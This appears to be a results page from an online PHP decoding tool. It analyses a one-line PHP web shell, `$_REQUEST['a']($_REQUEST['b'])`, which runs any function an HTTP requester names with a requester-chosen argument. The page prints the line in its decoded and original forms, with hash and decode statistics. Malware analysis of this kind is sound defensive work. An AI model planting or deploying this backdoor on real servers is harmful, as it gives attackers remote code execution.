Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_REQUEST['a']($_REQUEST['b']); ?>..

Decoded Output download

<?php 
$_REQUEST['a']($_REQUEST['b']); 
?>

Did this file decode correctly?

Original Code

<?php
$_REQUEST['a']($_REQUEST['b']);
?>

Function Calls

null 1

Variables

None

Stats

MD5 9fdec03cdc4d9fc1d543a95b296f445b
Eval Count 0
Decode Time 82 ms